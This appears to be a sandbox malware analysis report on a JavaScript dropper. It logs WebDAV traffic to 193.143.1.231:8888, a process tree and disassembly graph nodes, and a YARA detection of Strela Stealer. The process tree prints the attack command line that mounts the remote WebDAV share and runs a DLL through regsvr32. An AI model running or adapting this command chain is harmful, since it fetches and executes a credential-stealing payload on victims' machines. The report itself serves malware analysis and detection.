                Dec 17, 2024 15:16:15.995496035 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.996687889 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.996752977 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.996849060 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.998014927 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:15.998075962 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:15.998202085 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:16.042490959 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:44.672780991 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:44.672887087 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:44.672986031 CET497058888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:44.792531013 CET888849705193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:45.965971947 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:45.966187000 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:45.966187000 CET497068888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:46.086020947 CET888849706193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:47.756829977 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:47.757021904 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:47.757021904 CET497078888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:47.876621008 CET888849707193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:47.964276075 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:47.964345932 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:47.964579105 CET497088888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:48.084042072 CET888849708193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:52.919713020 CET888849709193.143.1.231192.168.2.5
                Dec 17, 2024 15:16:52.919805050 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:52.919895887 CET497098888192.168.2.5193.143.1.231
                Dec 17, 2024 15:16:53.039525032 CET888849709193.143.1.231192.168.2.5

                HTTP Request Dependency Graph

                • 193.143.1.231:8888

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.549704193.143.1.23188883944C:\Windows\System32\net.exe
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:16:02.329371929 CET107OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: DavClnt
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:16:03.748127937 CET223INHTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:03 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.549705193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:16:07.084291935 CET137OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:16:08.539954901 CET223INHTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:08 GMT
                Content-Length: 0
                Connection: keep-alive
                Allow: OPTIONS, LOCK, DELETE, PROPPATCH, COPY, MOVE, UNLOCK, PROPFIND
                Dav: 1, 2
                Ms-Author-Via: DAV


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.549706193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:16:10.208786011 CET692INHTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:09 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified><D:displayname></D:displayname></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.549707193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:16:11.761334896 CET692INHTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:11 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 520
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 2f 44 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 78 6d 6c 6e 73 3a [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:displayname></D:displayname><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype><D:collection xmlns:D="DAV:"/></D:resourcetype><D:getlastmodified>Mon, 16 Dec 2024 12:13:21 GMT</D:getlastmodified></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.549708193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:16:13.427613974 CET854INHTTP/1.1 207 Multi-Status
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:13 GMT
                Content-Type: text/xml; charset=utf-8
                Content-Length: 682
                Connection: keep-alive
                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 31 34 30 33 34 31 36 32 35 36 32 33 38 36 33 2e 64 6c 6c 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 6c 6f 63 6b 65 6e 74 72 79 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 65 78 63 6c 75 73 69 76 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 44 3a 77 72 69 74 65 2f 3e 3c 2f 44 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 44 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 44 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 67 65 74 63 6f 6e 74 65 6e 74 6c 65 [TRUNCATED]
                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/140341625623863.dll</D:href><D:propstat><D:prop><D:supportedlock><D:lockentry xmlns:D="DAV:"><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:resourcetype></D:resourcetype><D:getcontentlength>418816</D:getcontentlength><D:getlastmodified>Tue, 17 Dec 2024 14:13:22 GMT</D:getlastmodified><D:getetag>"1811fc5bc5a4e37266400"</D:getetag><D:displayname>140341625623863.dll</D:displayname><D:getcontenttype>application/octet-stream</D:getcontenttype></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.549709193.143.1.2318888
                TimestampBytes transferredDirectionData
                Dec 17, 2024 15:16:13.555913925 CET195OUTGET /140341625623863.dll HTTP/1.1
                Cache-Control: no-cache
                Connection: Keep-Alive
                Pragma: no-cache
                User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
                translate: f
                Host: 193.143.1.231:8888
                Dec 17, 2024 15:16:14.979101896 CET1236INHTTP/1.1 200 OK
                Server: nginx/1.22.1
                Date: Tue, 17 Dec 2024 14:16:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 418816
                Connection: keep-alive
                Accept-Ranges: bytes
                Etag: "1811fc5bc5a4e37266400"
                Last-Modified: Tue, 17 Dec 2024 14:13:22 GMT
                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdQag" `W.text `.rdatax@@.data@.pdatab@@


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
                Imagebase:0x7ff745dd0000
                File size:170'496 bytes
                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b820000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:3
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:4
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff63b820000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:09:16:00
                Start date:17/12/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff636720000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:10
                Start time:09:16:10
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b820000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:11
                Start time:09:16:10
                Start date:17/12/2024
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff7e6400000
                File size:25'088 bytes
                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:2.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:6.2%
                  Total number of Nodes:848
                  Total number of Limit Nodes:4
                  execution_graph 8151 224aaa6 8152 22414fc __CxxCallCatchBlock ExitProcess 8151->8152 8153 224aab9 8152->8153 8158 223cde8 __CxxCallCatchBlock ExitProcess 8153->8158 8159 224aaf8 __CxxCallCatchBlock 8153->8159 8154 223e560 __CxxCallCatchBlock ExitProcess 8155 224ab0c 8154->8155 8156 223e560 __CxxCallCatchBlock ExitProcess 8155->8156 8157 224ab1c 8156->8157 8158->8159 8159->8154 8449 224a7a6 8450 224a7be 8449->8450 8456 224a829 8449->8456 8451 223e560 __CxxCallCatchBlock ExitProcess 8450->8451 8450->8456 8452 224a80b 8451->8452 8453 223e560 __CxxCallCatchBlock ExitProcess 8452->8453 8454 224a820 8453->8454 8455 223e300 __GSHandlerCheck_EH ExitProcess 8454->8455 8455->8456 8352 224ab2c 8355 223ce64 8352->8355 8356 223ce8e 8355->8356 8357 223ce7c 8355->8357 8358 223e560 __CxxCallCatchBlock ExitProcess 8356->8358 8357->8356 8359 223ce84 8357->8359 8361 223ce93 8358->8361 8360 223ce8c 8359->8360 8362 223e560 __CxxCallCatchBlock ExitProcess 8359->8362 8361->8360 8363 223e560 __CxxCallCatchBlock ExitProcess 8361->8363 8364 223ceb3 8362->8364 8363->8360 8365 223e560 __CxxCallCatchBlock ExitProcess 8364->8365 8366 223cec0 8365->8366 8367 223e300 __GSHandlerCheck_EH ExitProcess 8366->8367 8368 223cec9 8367->8368 8457 2240fac 8458 2240b2c ExitProcess 8457->8458 8459 2240fb7 8458->8459 8462 2245c80 8459->8462 8461 2240fbc __free_lconv_mon 8464 2245c99 Concurrency::details::SchedulerProxy::DeleteThis __free_lconv_mon 8462->8464 8463 2245d19 Concurrency::details::SchedulerProxy::DeleteThis 8463->8461 8464->8463 8466 2248600 8464->8466 8467 2248630 8466->8467 8474 2248740 8467->8474 8469 224866e 8472 2248683 8469->8472 8473 22405dc _invalid_parameter_noinfo ExitProcess 8469->8473 8470 2248649 8470->8469 8471 22405dc _invalid_parameter_noinfo ExitProcess 8470->8471 8471->8469 8472->8464 8473->8472 8475 2248789 8474->8475 8476 224875b _invalid_parameter_noinfo 8474->8476 8475->8476 8478 2248698 8475->8478 8476->8470 8479 22486d8 8478->8479 8485 22486b3 _invalid_parameter_noinfo __free_lconv_mon 8478->8485 8480 2240c08 ExitProcess 8479->8480 8479->8485 8481 22486eb 8480->8481 8482 2245028 ExitProcess 8481->8482 8483 22486fd 8482->8483 8486 2248d7c 8483->8486 8485->8476 8487 2248d90 _invalid_parameter_noinfo 8486->8487 8488 2248da8 8486->8488 8487->8485 8488->8487 8490 2248e40 8488->8490 8491 2248e5c 8490->8491 8493 2248e91 8491->8493 8494 2248cac 8491->8494 8493->8487 8495 22433dc ExitProcess 8494->8495 8497 2248cc8 8495->8497 8496 2248cce 8496->8493 8497->8496 8499 22433dc ExitProcess 8497->8499 8502 2248d0b 8497->8502 8498 22433dc ExitProcess 8498->8496 8500 2248cfe 8499->8500 8501 22433dc ExitProcess 8500->8501 8501->8502 8502->8496 8502->8498 8160 22482a8 8161 22482b0 8160->8161 8162 22433dc ExitProcess 8161->8162 8163 22482d7 8162->8163 8164 2242aaa 8165 2242ab3 8164->8165 8167 2242ac5 __free_lconv_mon 8164->8167 8168 2243154 8165->8168 8169 2243176 8168->8169 8170 2243184 _set_fmode __scrt_get_show_window_mode 8169->8170 8172 2247eb4 8169->8172 8170->8167 8173 2247ed6 8172->8173 8174 2247ebd _set_fmode 8172->8174 8175 2240344 _invalid_parameter_noinfo ExitProcess 8174->8175 8176 2247ecd 8175->8176 8176->8170 8196 223c0f0 8197 223c100 8196->8197 8208 223e268 8197->8208 8199 223c10c _RTC_Initialize 8201 223c187 8199->8201 8212 223c35c 8199->8212 8202 223c139 8215 223d58c 8202->8215 8204 223c145 8204->8201 8230 223d480 8204->8230 8206 223c179 8206->8201 8235 223ddb8 8206->8235 8210 223e279 _set_fmode 8208->8210 8209 223e281 8209->8199 8210->8209 8211 2240344 _invalid_parameter_noinfo ExitProcess 8210->8211 8211->8209 8241 223c374 8212->8241 8214 223c365 8214->8202 8216 223d5ac 8215->8216 8225 223d5c3 _set_fmode __free_lconv_mon 8215->8225 8217 223d5b4 _set_fmode 8216->8217 8218 223d5ca 8216->8218 8222 2240344 _invalid_parameter_noinfo ExitProcess 8217->8222 8219 223f678 ExitProcess 8218->8219 8220 223d5cf 8219->8220 8258 2242e8c 8220->8258 8222->8225 8223 223d5e6 8262 223d774 8223->8262 8225->8204 8226 223d623 8226->8225 8227 223d774 ExitProcess 8226->8227 8228 223d675 8227->8228 8228->8225 8268 2242450 8228->8268 8231 223ed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8230->8231 8233 223d48d _set_fmode 8231->8233 8232 223d4c1 8232->8206 8233->8232 8234 2240344 _invalid_parameter_noinfo ExitProcess 8233->8234 8234->8232 8236 223de04 8235->8236 8237 223f678 ExitProcess 8236->8237 8239 223de19 __free_lconv_mon 8236->8239 8238 223de22 8237->8238 8238->8239 8333 223df38 8238->8333 8239->8201 8242 223c38e 8241->8242 8244 223c387 8241->8244 8245 223d964 8242->8245 8244->8214 8248 223dcd0 8245->8248 8247 223d9a6 8247->8244 8249 223dcec Concurrency::details::SchedulerProxy::DeleteThis 8248->8249 8252 223da00 8249->8252 8251 223dcf5 Concurrency::details::SchedulerProxy::DeleteThis 8251->8247 8253 223da2c 8252->8253 8257 223dab7 __free_lconv_mon 8252->8257 8254 2243154 ExitProcess 8253->8254 8256 223da93 __free_lconv_mon 8253->8256 8253->8257 8254->8256 8255 2243154 ExitProcess 8255->8257 8256->8255 8256->8257 8257->8251 8259 2242ecd 8258->8259 8260 2242ed1 _log10_special 8259->8260 8261 223f6d8 ExitProcess 8259->8261 8260->8223 8261->8260 8263 223d7b2 8262->8263 8264 22430cc ExitProcess 8263->8264 8266 223d81e 8263->8266 8264->8263 8265 223d90f 8265->8226 8266->8265 8267 22430cc ExitProcess 8266->8267 8267->8266 8269 2242458 8268->8269 8270 224247d _set_fmode 8269->8270 8272 2242494 8269->8272 8271 2240344 _invalid_parameter_noinfo ExitProcess 8270->8271 8276 224248d _invalid_parameter_noinfo __free_lconv_mon 8271->8276 8275 224254c 8272->8275 8272->8276 8278 22429a4 8272->8278 8301 2242b28 8272->8301 8275->8275 8275->8276 8318 22478c0 8275->8318 8276->8225 8280 22429d2 _set_fmode 8278->8280 8279 22429ee 8279->8272 8280->8279 8281 2242a36 8280->8281 8282 22478c0 ExitProcess 8280->8282 8283 22478c0 ExitProcess 8281->8283 8287 2242a53 _invalid_parameter_noinfo 8281->8287 8282->8281 8283->8287 8284 2242a5b _set_fmode __free_lconv_mon 8284->8272 8285 2242b8a 8286 2242bb1 8285->8286 8288 2242b9c 8285->8288 8291 223f6d8 ExitProcess 8286->8291 8287->8284 8287->8285 8322 2247e18 8287->8322 8290 22429a4 ExitProcess 8288->8290 8297 2242bac _log10_special __free_lconv_mon 8290->8297 8292 2242c0a 8291->8292 8293 2242ca7 8292->8293 8298 2242cd1 __free_lconv_mon 8292->8298 8294 22429a4 ExitProcess 8293->8294 8294->8297 8295 223f6d8 ExitProcess 8295->8298 8296 22429a4 ExitProcess 8296->8298 8297->8272 8298->8295 8298->8296 8298->8297 8299 2242ddf 8298->8299 8299->8297 8329 22474b0 8299->8329 8302 2242b68 8301->8302 8303 2242b8a 8301->8303 8302->8303 8306 2247e18 ExitProcess 8302->8306 8304 2242bb1 8303->8304 8305 2242b9c 8303->8305 8308 223f6d8 ExitProcess 8304->8308 8307 22429a4 ExitProcess 8305->8307 8306->8302 8314 2242bac _log10_special __free_lconv_mon 8307->8314 8309 2242c0a 8308->8309 8310 2242ca7 8309->8310 8315 2242cd1 __free_lconv_mon 8309->8315 8311 22429a4 ExitProcess 8310->8311 8311->8314 8312 223f6d8 ExitProcess 8312->8315 8313 22429a4 ExitProcess 8313->8315 8314->8272 8315->8312 8315->8313 8315->8314 8316 2242ddf 8315->8316 8316->8314 8317 22474b0 ExitProcess 8316->8317 8317->8314 8321 22478dd _set_fmode 8318->8321 8319 22478f8 8319->8275 8320 2240344 _invalid_parameter_noinfo ExitProcess 8320->8319 8321->8319 8321->8320 8323 2247e20 8322->8323 8324 2247e35 _set_fmode 8323->8324 8325 2247e4e 8323->8325 8326 2240344 _invalid_parameter_noinfo ExitProcess 8324->8326 8327 223f6d8 ExitProcess 8325->8327 8328 2247e45 8325->8328 8326->8328 8327->8328 8328->8287 8330 22474dd _set_fmode 8329->8330 8331 2240344 _invalid_parameter_noinfo ExitProcess 8330->8331 8332 22474f2 _log10_special 8330->8332 8331->8332 8332->8297 8334 223df5d _set_fmode __free_lconv_mon 8333->8334 8336 223df9b _invalid_parameter_noinfo __free_lconv_mon 8334->8336 8337 223e688 8334->8337 8336->8239 8340 223e695 _set_fmode 8337->8340 8338 2240344 _invalid_parameter_noinfo ExitProcess 8339 223e6b2 8338->8339 8339->8334 8340->8338 8340->8339 8177 223c8b4 8178 223c8e8 8177->8178 8179 223c8cc 8177->8179 8179->8178 8186 223ce18 8179->8186 8184 223e300 __GSHandlerCheck_EH ExitProcess 8185 223c90e 8184->8185 8187 223e560 __CxxCallCatchBlock ExitProcess 8186->8187 8188 223c8fa 8187->8188 8189 223ce2c 8188->8189 8190 223e560 __CxxCallCatchBlock ExitProcess 8189->8190 8191 223c906 8190->8191 8191->8184 8503 223c1b8 8504 223c1c1 _set_fmode 8503->8504 8505 2240344 _invalid_parameter_noinfo ExitProcess 8504->8505 8506 223e2c9 8504->8506 8505->8506 8123 2245478 8124 22454fd 8123->8124 8128 2245514 __GSHandlerCheck_EH 8124->8128 8129 2243ae0 8124->8129 8126 2247ef8 ExitProcess 8126->8128 8127 2245840 _log10_special 8128->8126 8128->8127 8130 22405dc _invalid_parameter_noinfo ExitProcess 8129->8130 8131 2243af7 8130->8131 8136 2244e80 8131->8136 8137 2243b1f 8136->8137 8138 2244e99 8136->8138 8140 2244eb8 8137->8140 8138->8137 8139 22422c8 ExitProcess 8138->8139 8139->8137 8141 2243b2f 8140->8141 8142 2244ed1 8140->8142 8141->8128 8142->8141 8143 223f65c ExitProcess 8142->8143 8143->8141 8344 223c2ff 8347 223d188 8344->8347 8348 223d2a8 __FrameHandler3::FrameUnwindToEmptyState 8347->8348 8349 223c313 8348->8349 8350 223d274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8348->8350 8351 223d36c 8350->8351 8406 2245d78 8407 2245d81 _set_fmode 8406->8407 8408 2245d8e _set_fmode 8406->8408 8408->8407 8409 2240344 _invalid_parameter_noinfo ExitProcess 8408->8409 8409->8407 8144 224aa79 8147 224640c 8144->8147 8148 2246426 8147->8148 8150 2246473 8147->8150 8149 223e560 __CxxCallCatchBlock ExitProcess 8148->8149 8148->8150 8149->8150 8410 224a979 8411 223e560 __CxxCallCatchBlock ExitProcess 8410->8411 8412 224a993 8411->8412 8413 223e560 __CxxCallCatchBlock ExitProcess 8412->8413 8414 224a9ae 8413->8414 8415 223e560 __CxxCallCatchBlock ExitProcess 8414->8415 8416 224a9c2 8415->8416 8421 2246608 8416->8421 8419 223e560 __CxxCallCatchBlock ExitProcess 8420 224aa04 8419->8420 8422 2246a10 __except_validate_context_record 8421->8422 8423 223e560 __CxxCallCatchBlock ExitProcess 8422->8423 8425 2246a42 8423->8425 8424 2246b98 8429 2246c48 __GSHandlerCheck_EH ExitProcess 8424->8429 8441 2246af0 8424->8441 8427 2246a9c 8425->8427 8428 2246b2a 8425->8428 8425->8441 8426 2246b17 8430 22410fc __FrameHandler3::FrameUnwindToEmptyState 2 API calls 8426->8430 